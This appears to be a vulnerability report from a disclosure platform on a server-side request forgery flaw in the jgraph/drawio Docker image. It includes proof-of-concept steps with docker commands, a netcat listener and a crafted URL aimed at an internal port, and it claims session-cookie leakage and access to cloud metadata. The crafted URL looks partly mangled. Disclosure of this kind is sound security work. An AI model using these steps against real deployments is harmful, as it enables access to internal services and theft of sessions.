SSRF in /service endpoint in jgraph/drawio
May 20th 2022
The problem came from this line of code
docker-drawio with following command :
docker run -it --rm --name="draw" -e EXPORT_URL=http://somesite.com -p 8080:8080 -p 8443:8443 jgraph/drawio
if the drawio
EXPORT_URL is set to an address without any
/ after the primary Hostname like
http://somesite.com( not like
http://somesite.com/), then an attacker can send a request to
127.0.0.1:4431 with a payload like
Proof of Concept
docker run -it --rm --name="draw" -e EXPORT_URL=http://google.com -p 8080:8080 -p 8443:8443 jgraph/drawioand then
docker psand get the drawio hash name ( called HN)
docker exec -it HN /bin/bash
apt update && apt install netcat && netcat -l 4430
- go to
http://draio-instance:firstname.lastname@example.org:4431you can see the http log on netcat had been recorded
it is a Full SSRF If you need another POC I can give you an HTTP logger script that returns some things to the attacker
Also, I don't know what exactly is
JSESSIONID cookie? but I can receive its content in a My public IP after redirect too!
The impact is achieved to all internal http webservers' contents if they host a file with a short and enumerable name! Or get cloud metadata, port scanning, and some special cases achieve RCE too!
However, it is an Open-redirect too.
about the CVSS:
Attack Complexity is high because this vulnerability depends on some special configuration for EXPORT_URL.
Availability is none
Availability can be high as it is a full SSRF.
I think 7.4 is a good score if you don't please tell me to change it, please.